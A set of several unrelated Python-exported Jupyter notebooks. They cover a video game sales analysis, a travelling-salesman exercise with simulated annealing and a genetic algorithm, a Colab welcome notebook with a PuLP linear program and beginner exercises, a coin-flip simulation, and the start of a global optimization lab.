# + colab={"base_uri": "https://localhost:8080/"} id="3NRhktd53wjX" outputId="844771dd-a7da-41d0-dfc3-0206748c63f5"
df.shape
# + colab={"base_uri": "https://localhost:8080/"} id="DKqB2FQk68c0" outputId="d8ad8950-2ebf-4f40-a6ab-4bb980493faa"
df[df.duplicated()].count()
# + colab={"base_uri": "https://localhost:8080/"} id="GAQ05Bnj7U9H" outputId="480d1bbc-0e79-4ee5-9a22-01f3a83f2bad"
df.info()
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="GDugZ9RO7jDH" outputId="7d654b89-775c-4dc4-e688-bfd12f4d8e8a"
df.head()
# + id="LG5NXGw_7J0j"
## EDA
# + colab={"base_uri": "https://localhost:8080/", "height": 300} id="2x9QLiWu81Z6" outputId="eaaf3f50-677b-4eaa-d517-2cfe8dd50674"
df.describe()
# + id="ILhh3d217NxX"
df_top_games = df[['name', 'na_sales', 'eu_sales', 'jp_sales', 'other_sales']]
# + colab={"base_uri": "https://localhost:8080/"} id="Xeu3edUu9A1O" outputId="de8a31e1-8134-4c5d-c095-f434acf0cfb6"
for col in ['na_sales', 'eu_sales', 'jp_sales', 'other_sales']:
print(col)
print(df_top_games[df_top_games[col]==df_top_games[col].max()])
# + [markdown] id="5iP6-2WUABLm"
# The best-selling games across the regions were Wii Sports, Pokemon and GTA
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="txr9cKI7-Zi5" outputId="2c5f396c-fa02-4f8c-a5a8-fdfa9509bb3f"
for col in ['na_sales', 'eu_sales', 'jp_sales', 'other_sales']:
df_plot = df_top_games.sort_values(by=col, ascending=False).head(5)
df_plot[['name',col]].set_index('name').plot.bar(rot=90)
plt.title(f'Sales in {col}')
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="MnyYRIZUAYJT" outputId="4c940729-7681-4779-d54e-c85110d9ee55"
## Best seller by category
df.head()
# + id="8BdYzcTTAm2H"
df_genre = df[['name','genre', 'global_sales']]
# + colab={"base_uri": "https://localhost:8080/", "height": 457} id="4UbaolARBxVj" outputId="5c267be3-ea68-45e8-d4cb-3bf51263a952"
df_genre.groupby('genre').agg({'name':'first', 'global_sales':'max'})
# + colab={"base_uri": "https://localhost:8080/"} id="RjdQC7hpBiCv" outputId="163aecab-9865-4f15-b4a9-b5799009afb8"
df_genre.genre.unique()
# + id="1b1l56aYC3PO"
## Games by platform
# + id="wIYd9oC3C8q4"
df_plat = df[['name','platform', 'global_sales']]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="y_WoN_IlDLTO" outputId="52c88958-035b-42a2-a8fb-30e39acbbb67"
df_plat.groupby('platform').agg({'name':'first', 'global_sales':'max'}).sort_values(by='global_sales', ascending=False)
# + id="1ajXqUdvDPl3"
### Exclusive games
# + id="NaGeWsFrEVvW"
df_unique_game_by_plat = df.groupby('name').agg({'platform':'nunique'})
# + id="wOrJj_axE8Ou"
df_unique_game_by_plat = df_unique_game_by_plat[df_unique_game_by_plat.platform==1].reset_index()
# + id="2OhFtUazF7U-"
df_exclusive = df.merge(df_unique_game_by_plat, on='name', how='left')
# + id="ETxStIo1Gvh8"
df_exclusive.rename(columns={'platform_y':'is_exclusive'}, inplace=True)
df_exclusive.is_exclusive = df_exclusive.is_exclusive.fillna(0)
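# A toy version of the exclusivity flag built above, with made-up names: a title counts as "exclusive" when it appears on exactly one platform.

```python
import pandas as pd

toy = pd.DataFrame({'name': ['a', 'a', 'b'],
                    'platform': ['PS', 'XB', 'PS']})
# count distinct platforms per title, keep those seen on exactly one
counts = toy.groupby('name').agg({'platform': 'nunique'})
exclusive = counts[counts.platform == 1].reset_index()
print(list(exclusive.name))  # only 'b' is on a single platform
```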
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="eVGBCLQ2Itl4" outputId="91e0d668-98ee-4155-84a5-82feccf2abbe"
df_exclusive.groupby(['year','is_exclusive']).sum()[['global_sales']].reset_index().head()
# + colab={"base_uri": "https://localhost:8080/", "height": 621} id="7htRcsicHJvd" outputId="7b751c41-7e03-4812-8306-54e43baee241"
df_exclusive.groupby(['year','is_exclusive']).sum()[['global_sales']].reset_index().pivot(index='year', columns='is_exclusive', values='global_sales').plot(figsize=(15,10))
plt.title('Exclusive vs Non-Exclusive Sales per Year')
plt.legend(['Non-Exclusive', 'Exclusive'])
plt.show()
# + id="kILZL9JkHtKH" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="b791a412-cc61-484f-cdbb-ced5d87a946d"
df.head()
# + id="YOBPJFFLGE3K"
df_publisher = df.groupby('publisher').agg({'global_sales':'sum', 'name':'nunique'})
# + colab={"base_uri": "https://localhost:8080/", "height": 437} id="PWi7qfsEGvih" outputId="901bd376-ad64-4041-ff46-c477a73b9aa7"
df_publisher.sort_values('global_sales', ascending=False)['global_sales'].head().plot.bar()
plt.title('Top 5 Publisher in Global Sales')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 437} id="PgfUyOMHIHfv" outputId="12fbcc6d-9ceb-41fe-9bf1-fea8c08fc4c3"
df_publisher.sort_values('name', ascending=False)['name'].head().plot.bar()
plt.title('Top 5 Publisher Number of Games')
plt.show()
# + id="-32hNUfzKUTI"
df['sales_without_na'] = df['jp_sales']+df.eu_sales+df.other_sales
# + colab={"base_uri": "https://localhost:8080/", "height": 623} id="EvcKoAwkLM3P" outputId="ee2f7d42-2aa5-43b0-b2a1-4b8c5014b394"
## NA x Others
df.groupby('year').agg({'sales_without_na':'sum', 'na_sales':'sum', 'jp_sales':'sum'}).plot(figsize=(15,10))
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="lLrrLNbrL1jS" outputId="12fa24f2-ed46-4cf9-b8ab-5503293bfc1f"
corr = df[['na_sales','sales_without_na', 'eu_sales','jp_sales','global_sales']].corr()
corr
# + colab={"base_uri": "https://localhost:8080/", "height": 357} id="hQQMwl0qPaYt" outputId="cfcc2feb-de43-4c5e-b01b-61599c076e7a"
sns.heatmap(corr)
plt.title('Correlation')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="CmoCpB_5TLKH" outputId="486de209-1d1b-4734-867c-548eb6f8bc7c"
df.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 238} id="jGHBgNywQAhM" outputId="655a344c-1495-43c7-d010-53893fede5c4"
df_genre_by_region = df.groupby('genre').sum()
df_genre_by_region.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="ysSued8KTSW9" outputId="60041fd3-890c-4375-9289-1ed3a32790c3"
df_genre_by_region[['na_sales','eu_sales', 'jp_sales', 'other_sales']].plot.barh(figsize=(15,10))
plt.show()
# + [markdown] id="GxzlvYbtiejV"
# ### Note
#
# The commented-out snippets did not run on Colab due to their computational cost; run them locally to compare the distance between game titles.
# + id="IBvZr2N3Tts6"
df.name = df.name.str.lower()
# + id="HBxXtr1AWoIJ"
df.name = df.name.str.replace(' ', '_')
# + colab={"base_uri": "https://localhost:8080/"} id="OF0XTt0gXtSw" outputId="fb5d3027-b726-44da-8300-49d8cb03fd9e"
# !pip install unidecode
# + id="da8MsqaqXq7P"
import unidecode
# + id="W2bT-AQVXRqg"
df.name = df.name.apply(unidecode.unidecode)
# + colab={"base_uri": "https://localhost:8080/"} id="t3CsBgetZmwf" outputId="fa715f19-0939-4e49-8dae-8a5cb14d02db"
df_1 = df[['name']].copy()
df_2 = df[['name']].copy()
df_1['key'] = 0
df_2['key'] = 0
# + id="L6KeSAy3XoaI"
# Run locally
## df_matrix = df_2.merge(df_1, how='outer', on='key', validate='many_to_many', suffixes=('x_','y_'))
# + id="aW7LFywAYuuY"
# df_matrix.groupby('name').count()
# JACCARD
# def minhash(input_question, compare_question):
# score = 0.0
# shingles = lambda s: set(s[i:i+3] for i in range(len(s)-2))
# jaccard_distance = lambda seta, setb: len(seta & setb)/float(len(seta | setb))
# try:
# score = jaccard_distance(shingles(input_question), shingles(compare_question))
# except ZeroDivisionError:
# print('ZeroDivisionError')
# return score
# df['score'] = df.apply(lambda x: minhash(x.x_name, y_name))
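# A runnable, standalone sketch of the 3-gram shingle + Jaccard similarity idea from the commented block above (no DataFrame needed):

```python
def shingles(s):
    # all overlapping 3-character substrings of s
    return set(s[i:i + 3] for i in range(len(s) - 2))

def jaccard(a, b):
    # |intersection| / |union| of the two shingle sets
    sa, sb = shingles(a), shingles(b)
    return len(sa & sb) / float(len(sa | sb)) if (sa | sb) else 0.0

print(jaccard("wii_sports", "wii_sports_resort"))  # high: shared prefix
print(jaccard("wii_sports", "tetris"))             # no shingles in common
```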
# + colab={"base_uri": "https://localhost:8080/"} id="kRjnMUMCZP_H" outputId="165fda71-19e8-45d3-933c-1e868a2ce8df"
for col in ['na_sales', 'eu_sales', 'jp_sales', 'other_sales']:
print(col)
print(df[df[col]==df[col].min()].head(1))
# + [markdown] id="kc67ORIPcssG"
# # Conclusions
#
# - Some games sold more on more widespread platforms
# - Platforms where consoles were bundled with a game skew the count
# - Strategy games do not sell well outside Japan
# - The North American market is always the biggest buyer in every category, especially action games.
|
_notebook/2021_11_20_EDA_Venda_de_jogos.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
sys.path.append('../')
from gonance import *
# %matplotlib inline
crowdlending
crowdlending.barh('Period', ['Profit', 'Estimated Profit'])
crowdlending.plot('Period', ['Profit', 'Estimated Profit'])
crowdlending.scatter('Period', ['Profit', 'Estimated Profit'])
|
examples/gonance.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Exercise 4
# Try to solve two different instances of the TSP using Simulated Annealing and an Evolutionary Algorithm. The first problem has 29 cities and the second, 101 cities.
# The city locations are stored in a matrix contained in the file ending in 'cities.npy', while the costs of traveling from one city to another are contained in another matrix stored in the file ending in 'distances.npy'. For both cases the optimal solutions are known; they can be found in the files ending in 'opt.tour.npy'.
#
# You are asked to:
#
# a) Propose a suitable representation for the solutions.
#
# b) Propose an evaluation function that qualifies how good a solution is.
#
# c) Define how neighboring solutions will be generated when using Simulated Annealing and which operators will be used in the Evolutionary Algorithm.
#
# d) Implement and test what was defined in the previous points. Evaluate the results obtained. Detail all the parameters used during the execution of both algorithms. Justify.
# +
import numpy as np
import matplotlib.pyplot as plt
#from matplotlib import pylab
#import mpld3
# %matplotlib inline
#mpld3.enable_notebook()
from busqueda_local import hill_climb
from busqueda_local import simulated_annealing
from deap import base, creator, tools, algorithms
# +
# -*- coding: utf-8 -*-
"""
Ejercicio 4: Problema del Viajante.
"""
CIUDADES = np.load('bayg29.cities.npy')
DISTANCIAS = np.load('bayg29.distances.npy')
RECORRIDO_OPTIMO = np.load('bayg29.opt.tour.npy') # Minimum distance: 1610
#CIUDADES = np.load('eil101.cities.npy')
#DISTANCIAS = np.load('eil101.distances.npy')
#RECORRIDO_OPTIMO = np.load('eil101.opt.tour.npy') # Minimum distance: 629
def distancia_recorrido(recorrido):
    """ Return the total length of the tour. """
largo = 0
ciudad_anterior = recorrido[-1]
for ciudad in recorrido:
largo += DISTANCIAS[ciudad_anterior, ciudad]
ciudad_anterior = ciudad
return largo
def mostrar_recorrido(recorrido):
    # list() guards against NumPy arrays, where `+` would add element-wise instead of appending
    r = list(recorrido) + [recorrido[0]]
plt.figure(1)
plt.clf()
plt.plot(CIUDADES[0], CIUDADES[1], 'o')
plt.plot(CIUDADES[0, r], CIUDADES[1, r], 'r')
plt.show()
# -
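# A tiny check of the closed-tour length logic used by `distancia_recorrido` above, on a hypothetical 3-city distance matrix:

```python
import numpy as np

D = np.array([[0, 1, 2],
              [1, 0, 1],
              [2, 1, 0]])

def tour_length(tour, dist):
    # start from the last city so the tour is closed
    total, prev = 0, tour[-1]
    for city in tour:
        total += dist[prev, city]
        prev = city
    return total

print(tour_length([0, 1, 2], D))  # 2 + 1 + 1 = 4
```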
# Leftover constants from another exercise; commented out so they do not
# clobber the CIUDADES matrix loaded above.
#CIUDADES = 1047
#gananciaPorH = 9
#costoPorKm = 2500
# # Simulated Annealing
# ## New random solutions
def nuevos():
a=np.arange(CIUDADES.shape[1])
np.random.shuffle(a)
return a
DISTANCIAS.shape
nuevos()
# ## Evaluation
def evaluacion(x):
return -distancia_recorrido(x)
# ## Neighbors
# +
def invertirPos(x, pos1, pos2):
    # Swap two cities; work on a copy so the original tour is not mutated.
    y = x.copy()
    y[pos1], y[pos2] = y[pos2], y[pos1]
    return y

def vecinos(x):
    v = []
    pos = np.random.randint(0, x.size, 3)
    # Redraw until the three positions are pairwise distinct.
    while pos[0] == pos[1] or pos[1] == pos[2] or pos[0] == pos[2]:
        pos = np.random.randint(0, x.size, 3)
    v.append(invertirPos(x, pos[0], pos[1]))
    # v.append(invertirPos(x, pos[0], pos[2]))
    # v.append(invertirPos(x, pos[1], pos[2]))
    return v
# -
# ## Define temperatures
# Probability `prob` of accepting solutions worse by more than `dif` at the start
dif = 0.5
prob = 0.03
T_max = -dif / np.log(prob)
# Probability `prob` of accepting solutions worse by more than `dif` at the end
dif = 0.05
prob = 0.03
T_min = -dif / np.log(prob)
# Reduction factor for the desired number of iterations
N = 30
reduccion = np.exp(np.log(T_min / T_max) / N)
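# The temperature formulas above invert the Metropolis acceptance rule: with T = -dif / ln(prob), a move worse by `dif` is accepted with probability exactly `prob`. A quick check:

```python
import numpy as np

dif, prob = 0.5, 0.03
T = -dif / np.log(prob)
# Metropolis acceptance probability of a move worse by `dif` at temperature T
accept = np.exp(-dif / T)
print(accept)  # 0.03
```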
# ## Search
def buscar(i):
    mejor = nuevos()
    e = 0
    for j in range(i):
        mejor, evaluaciones = simulated_annealing(mejor, evaluacion, vecinos,
                                                  T_max=T_max,
                                                  T_min=T_min,
                                                  reduccion=reduccion)
        e += evaluaciones
    print("Total solutions evaluated:", e)
    print("Gap to the optimal tour length:", evaluacion(RECORRIDO_OPTIMO) - evaluacion(mejor))
    return
buscar(50)
# # Evolutionary Algorithm
# ## Define the expected fitness
# A negative weight makes DEAP minimize; here it is scaled by the optimal tour length.
creator.create("Fitness", base.Fitness, weights=(evaluacion(RECORRIDO_OPTIMO),))
creator.create("Individual", list, fitness=creator.Fitness)
# ## Define the individual's DNA
def nuevoCamino():
a=np.arange(CIUDADES.shape[1])
np.random.shuffle(a)
return a
toolbox = base.Toolbox()
toolbox.register("individual", tools.initIterate, creator.Individual, nuevoCamino)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
# ## Define evaluation, selection and mutation
def evaluarADN(x):
return [distancia_recorrido(x)]
toolbox.register("evaluate", evaluarADN)
toolbox.register("mate", tools.cxOrdered)
toolbox.register("mutate", tools.mutShuffleIndexes, indpb=0.40)
toolbox.register("select", tools.selTournament, tournsize=5)
def main():
pop = toolbox.population(n=1000)
hof = tools.HallOfFame(1)
stats = tools.Statistics(lambda ind: ind.fitness.values)
stats.register("avg", np.mean)
stats.register("min", np.min)
stats.register("max", np.max)
pop, logbook = algorithms.eaSimple(pop, toolbox, cxpb=0.5, mutpb=0.2, ngen=100, stats=stats, halloffame=hof, verbose=True)
return pop, logbook, hof
if __name__ == "__main__":
pop, log, hof = main()
print("Best individual is: %s\nwith fitness: %s" % (hof[0], hof[0].fitness))
gen, avg, min_, max_ = log.select("gen", "avg", "min", "max")
plt.plot(gen, avg, label="average")
plt.plot(gen, min_, label="minimum")
plt.plot(gen, max_, label="maximum")
plt.xlabel("Generation")
plt.ylabel("Fitness")
plt.legend(loc="lower right")
print("MEJOR RECORRIDO:",evaluacion(RECORRIDO_OPTIMO))
mostrar_recorrido(RECORRIDO_OPTIMO)
|
Argentina - Mondiola Rock - 90 pts/Practica/TP2/ejercicio 4/Ejercicio 4.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/rohini28sept/ESC2/blob/main/Copy_of_Welcome_To_Colaboratory.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="5fCEDCU_qrC0"
# <p><img alt="Colaboratory logo" height="45px" src="/img/colab_favicon.ico" align="left" hspace="10px" vspace="0px"></p>
#
# <h1>What is Colaboratory?</h1>
#
# Colaboratory, or "Colab" for short, allows you to write and execute Python in your browser, with
# - Zero configuration required
# - Free access to GPUs
# - Easy sharing
#
# Whether you're a **student**, a **data scientist** or an **AI researcher**, Colab can make your work easier. Watch [Introduction to Colab](https://www.youtube.com/watch?v=inN8seMm7UI) to learn more, or just get started below!
# + [markdown] id="GJBs_flRovLc"
# ## **Getting started**
#
# The document you are reading is not a static web page, but an interactive environment called a **Colab notebook** that lets you write and execute code.
#
# For example, here is a **code cell** with a short Python script that computes a value, stores it in a variable, and prints the result:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} id="gJr_9dXGpJ05" outputId="9f556d03-ec67-4950-a485-cfdba9ddd14d"
seconds_in_a_day = 24 * 60 * 60
seconds_in_a_day
# + [markdown] id="2fhs6GZ4qFMx"
# To execute the code in the above cell, select it with a click and then either press the play button to the left of the code, or use the keyboard shortcut "Command/Ctrl+Enter". To edit the code, just click the cell and start editing.
#
# Variables that you define in one cell can later be used in other cells:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} id="-gE-Ez1qtyIA" outputId="94cb2224-0edf-457b-90b5-0ac3488d8a97"
seconds_in_a_week = 7 * seconds_in_a_day
seconds_in_a_week
# + [markdown] id="lSrWNr3MuFUS"
# Colab notebooks allow you to combine **executable code** and **rich text** in a single document, along with **images**, **HTML**, **LaTeX** and more. When you create your own Colab notebooks, they are stored in your Google Drive account. You can easily share your Colab notebooks with co-workers or friends, allowing them to comment on your notebooks or even edit them. To learn more, see [Overview of Colab](/notebooks/basic_features_overview.ipynb). To create a new Colab notebook you can use the File menu above, or use the following link: [create a new Colab notebook](http://colab.research.google.com#create=true).
#
# Colab notebooks are Jupyter notebooks that are hosted by Colab. To learn more about the Jupyter project, see [jupyter.org](https://www.jupyter.org).
# + [markdown] id="UdRyKR44dcNI"
# ## Data science
#
# With Colab you can harness the full power of popular Python libraries to analyze and visualize data. The code cell below uses **numpy** to generate some random data, and uses **matplotlib** to visualize it. To edit the code, just click the cell and start editing.
# + colab={"base_uri": "https://localhost:8080/", "height": 281} id="C4HZx7Gndbrh" outputId="46abc637-6abd-41b2-9bba-80a7ae992e06"
import numpy as np
from matplotlib import pyplot as plt
ys = 200 + np.random.randn(100)
x = [x for x in range(len(ys))]
plt.plot(x, ys, '-')
plt.fill_between(x, ys, 195, where=(ys > 195), facecolor='g', alpha=0.6)
plt.title("Sample Visualization")
plt.show()
# + [markdown] id="4_kCnsPUqS6o"
# You can import your own data into Colab notebooks from your Google Drive account, including from spreadsheets, as well as from Github and many other sources. To learn more about importing data, and how Colab can be used for data science, see the links below under [Working with Data](#working-with-data).
# + [markdown] id="OwuxHmxllTwN"
# ## Machine learning
#
# With Colab you can import an image dataset, train an image classifier on it, and evaluate the model, all in just [a few lines of code](https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/quickstart/beginner.ipynb). Colab notebooks execute code on Google's cloud servers, meaning you can leverage the power of Google hardware, including [GPUs and TPUs](#using-accelerated-hardware), regardless of the power of your machine. All you need is a browser.
# + [markdown] id="ufxBm1yRnruN"
# Colab is used extensively in the machine learning community with applications including:
# - Getting started with TensorFlow
# - Developing and training neural networks
# - Experimenting with TPUs
# - Disseminating AI research
# - Creating tutorials
#
# To see sample Colab notebooks that demonstrate machine learning applications, see the [machine learning examples](#machine-learning-examples) below.
# + [markdown] id="-Rh3-Vt9Nev9"
# ## More Resources
#
# ### Working with Notebooks in Colab
# - [Overview of Colaboratory](/notebooks/basic_features_overview.ipynb)
# - [Guide to Markdown](/notebooks/markdown_guide.ipynb)
# - [Importing libraries and installing dependencies](/notebooks/snippets/importing_libraries.ipynb)
# - [Saving and loading notebooks in GitHub](https://colab.research.google.com/github/googlecolab/colabtools/blob/master/notebooks/colab-github-demo.ipynb)
# - [Interactive forms](/notebooks/forms.ipynb)
# - [Interactive widgets](/notebooks/widgets.ipynb)
# - <img src="/img/new.png" height="20px" align="left" hspace="4px" alt="New"></img>
# [TensorFlow 2 in Colab](/notebooks/tensorflow_version.ipynb)
#
# <a name="working-with-data"></a>
# ### Working with Data
# - [Loading data: Drive, Sheets, and Google Cloud Storage](/notebooks/io.ipynb)
# - [Charts: visualizing data](/notebooks/charts.ipynb)
# - [Getting started with BigQuery](/notebooks/bigquery.ipynb)
#
# ### Machine Learning Crash Course
# These are a few of the notebooks from Google's online Machine Learning course. See the [full course website](https://developers.google.com/machine-learning/crash-course/) for more.
# - [Intro to Pandas](/notebooks/mlcc/intro_to_pandas.ipynb)
# - [Tensorflow concepts](/notebooks/mlcc/tensorflow_programming_concepts.ipynb)
#
# <a name="using-accelerated-hardware"></a>
# ### Using Accelerated Hardware
# - [TensorFlow with GPUs](/notebooks/gpu.ipynb)
# - [TensorFlow with TPUs](/notebooks/tpu.ipynb)
# + [markdown] id="P-H6Lw1vyNNd"
# <a name="machine-learning-examples"></a>
#
# ## Machine Learning Examples
#
# To see end-to-end examples of the interactive machine learning analyses that Colaboratory makes possible, check out these tutorials using models from [TensorFlow Hub](https://tfhub.dev).
#
# A few featured examples:
#
# - [Retraining an Image Classifier](https://tensorflow.org/hub/tutorials/tf2_image_retraining): Build a Keras model on top of a pre-trained image classifier to distinguish flowers.
# - [Text Classification](https://tensorflow.org/hub/tutorials/tf2_text_classification): Classify IMDB movie reviews as either *positive* or *negative*.
# - [Style Transfer](https://tensorflow.org/hub/tutorials/tf2_arbitrary_image_stylization): Use deep learning to transfer style between images.
# - [Multilingual Universal Sentence Encoder Q&A](https://tensorflow.org/hub/tutorials/retrieval_with_tf_hub_universal_encoder_qa): Use a machine learning model to answer questions from the SQuAD dataset.
# - [Video Interpolation](https://tensorflow.org/hub/tutorials/tweening_conv3d): Predict what happened in a video between the first and the last frame.
#
# + id="Sq63pu4H5Tmj" colab={"base_uri": "https://localhost:8080/"} outputId="971081a3-09f7-464c-c6ad-3faac026ce7e"
# !pip install pulp
# + id="_2ugc8Kp6z_G" colab={"base_uri": "https://localhost:8080/"} outputId="6a7f7b2e-21b0-4181-9c62-f10ccf3fb9b7"
# import the library pulp as p
import pulp as p
# Create an LP maximization problem
Lp_prob = p.LpProblem('Problem', p.LpMaximize)
# Create problem Variables
x = p.LpVariable("x", lowBound = 0) # Create a variable x >= 0
y = p.LpVariable("y", lowBound = 0) # Create a variable y >= 0
# Objective Function
Lp_prob += 17.1667 * x + 25.8667 * y
# Constraints:
Lp_prob += 13 * x + 19 * y <= 2400
Lp_prob += 20 * x + 29 * y <= 2100
Lp_prob += x >= 10
Lp_prob += x >= 0
Lp_prob += y >= 0
# Display the problem
print(Lp_prob)
status = Lp_prob.solve() # Solver
print(p.LpStatus[status]) # The solution status
# Printing the final solution
print(p.value(x), p.value(y), p.value(Lp_prob.objective))
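As a sanity check on the PuLP result above, the same LP can be solved with `scipy.optimize.linprog` (a sketch; it assumes SciPy is available, and since `linprog` minimizes, the objective is negated):

```python
from scipy.optimize import linprog

# Maximize 17.1667*x + 25.8667*y by minimizing its negation
c = [-17.1667, -25.8667]
A_ub = [[13, 19], [20, 29]]        # 13x + 19y <= 2400, 20x + 29y <= 2100
b_ub = [2400, 2100]
bounds = [(10, None), (0, None)]   # x >= 10, y >= 0

res = linprog(c, A_ub=A_ub, b_ub=b_ub, bounds=bounds)
print(res.x, -res.fun)  # optimum at x = 10, y = 1900/29 ≈ 65.52
```

The binding constraints are `x >= 10` and `20x + 29y <= 2100`; the first constraint has slack at the optimum.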
# + id="1RIQmRky9OJm" colab={"base_uri": "https://localhost:8080/"} outputId="9d585fbc-d67b-4611-dd66-2a13859b3599"
l=[1,'a',2,'abc']
print(l)
# + id="ZocJZ3p-9iQ0"
l=[-2]
# + id="T2x1z-bM9ndt" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="38f917a4-85aa-4ddc-c8f8-cc4007ee11b8"
l[-2]  # IndexError: l = [-2] has a single element, so index -2 is out of range
# + id="DhjEPyeJ9s2A" colab={"base_uri": "https://localhost:8080/"} outputId="52d11c32-dc87-4df7-9716-b16f2c4d24ec"
l=[1,'a',2,'abc']
print(l[2])
print(l[-2])
print(l[0:])
print(l[0:1])
print(l[2:])
print(l[:3])
print(l[-4:-1])
# + id="UOHZ-1FW-KOu"
def sum(a, b):  # note: this shadows the built-in sum()
z=a+b
return z
# + id="OkBZGbw4_wKF" colab={"base_uri": "https://localhost:8080/"} outputId="df0d1cd4-10a5-4c36-aedd-179b1c5de512"
d= sum("a","b")
print(d)
# + id="LZh_8bkKA-Gn"
import numpy as np
import matplotlib.pyplot as plt
# + id="eRo_aQN1Dbs5" colab={"base_uri": "https://localhost:8080/", "height": 287} outputId="ee6e2348-1559-4ebd-e61d-936fb6b95f02"
x=[1,2,3,4,5]
y=[4,5,6,7,8]
plt.plot(x,y)
plt.xlim(0,10)
plt.ylim(0,10)
# + id="mdObL2axEfc4"
x=[1,2,3,4,5]
y=[]
for i in x:
z=2*i
y.append(z)
# + id="yg2PAtKCFwtQ" colab={"base_uri": "https://localhost:8080/"} outputId="46067a5b-9f11-4b08-c547-e58bef401437"
x=np.linspace(1,5,5)
y=2*x
print(y)
# + id="7Z2EU3SfHAaH" colab={"base_uri": "https://localhost:8080/", "height": 283} outputId="94eaa4a5-a6fb-4790-86c4-e089a4e861ea"
x=np.linspace(1,20,50)
y=18-2*x
y1=(42-2*x)/3
plt.plot(x,y)
plt.plot(x,y1)
# + id="KS58_WuHIlua"
# + id="ahNKlswyIzmF" colab={"base_uri": "https://localhost:8080/", "height": 287} outputId="4d34f71f-30f9-44ac-c2c8-e70686a44c8d"
x=np.linspace(1,20,50)
y=18-2*x
y1=(42-2*x)/3
plt.plot(x,y,label='2x+y=18')
plt.plot(x,y1,label='2x+2y=42')
plt.xlim(0,30)
plt.ylim(0,20)
plt.legend()
# + id="25_dW7HQJPl3" colab={"base_uri": "https://localhost:8080/"} outputId="a196eca8-6b52-484f-8b50-31d91bd32dee"
x=np.array([1,2,3])
x1=np.array(([1],[2],[3]))
print(x)
print(x1)
# + id="y_xpXlx3KLfK" colab={"base_uri": "https://localhost:8080/", "height": 327} outputId="8230fd83-e25a-4eb3-9eb0-e1d5e4a2e1cd"
table=np.array([[1,2,3],[4,5,6],[7,8,9]])
print(table)
print(table[2,1])
print(table[2])
print(table[-2])
print(table[1])
print(table)
# + id="572e5WeZKjSV"
|
Copy_of_Welcome_To_Colaboratory.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import random
# flip coins 100 times and return number of heads
def coin_trial():
heads = 0
for i in range(100):
if random.random() <= 0.5: # Random float: 0.0 <= x < 1.0
heads +=1
return heads
# do the above experiments for n times and return the average of all the results
def simulate(n):
trials = []
for i in range(n):
trials.append(coin_trial())
return(sum(trials)/n)
# -
coin_trial()
simulate(100)
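The experiment above gives a different answer each run; a seeded variant (a sketch — `coin_trial_seeded`, `simulate_seeded`, and `seed` are names introduced here) makes the result reproducible:

```python
import random

def coin_trial_seeded(rng):
    """Flip a fair coin 100 times with the given generator; return the number of heads."""
    return sum(1 for _ in range(100) if rng.random() <= 0.5)

def simulate_seeded(n, seed=0):
    """Average heads count over n trials, using a dedicated seeded generator."""
    rng = random.Random(seed)
    return sum(coin_trial_seeded(rng) for _ in range(n)) / n

print(simulate_seeded(1000))  # close to the expected value of 50
```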
|
flip coins trials.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div>
# <img src="figures/svtLogo.png"/>
# </div>
# <center><h1>Mathematical Optimization for Engineers</h1></center>
# <center><h2>Lab 10 - Deterministic Global Optimization</h2></center>
# In this exercise, we'll look at deterministic global optimization of box-constrained, two-dimensional, non-convex problems. We will implement the branch-and-bound method and use the $\alpha$BB method to construct convex relaxations of non-convex objective functions.
# <br>
# <br>
# $$\begin{aligned}
# \min_{\mathbf x\in X} \quad f(\mathbf x) \\
# %\mbox{s.t. } \quad g & \; \leq \; 15 \\
# \end{aligned}$$
# <br>
# <br>
# <u>Task</u>: Go through the code and fill in the missing bits to complete the implementation. Missing bits are marked with the comment <i># add your code here</i>
# +
import numpy as np
# we will use a local solver from scipy for upper-bounding problem
from scipy import optimize as sp
# to construct relaxations for lower-bounding problem
from math import inf, sin, cos, sqrt
# for branching
import copy
# for plotting
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
from matplotlib import cm
# -
# ### Objective functions, to experiment on:
# Return $f(\mathbf x)$ for input $\mathbf x$
def sixhump(x): #scipy-lectures.org/intro/scipy/auto_examples/plot_2d_minimization.html
return ((4 - 2.1*x[0]**2 + x[0]**4 / 3.) * x[0]**2 + x[0] * x[1] + (-4 + 4*x[1]**2) * x[1] **2)
def adjiman (X):
x, y = X[0], X[1]
return (np.cos(x) * np.sin(y)) - (x / (y**2.0 + 1.0))
def schwefel(x):
n = 2
s = 0
for i in range(0,n):
s = s - 1 * x[i] * sin(sqrt(abs(x[i])))
y = 418.9829 * n + s
return y
def griewank(x):
x1 = x[0]
x2 = x[1]
sum = 0
prod = 1
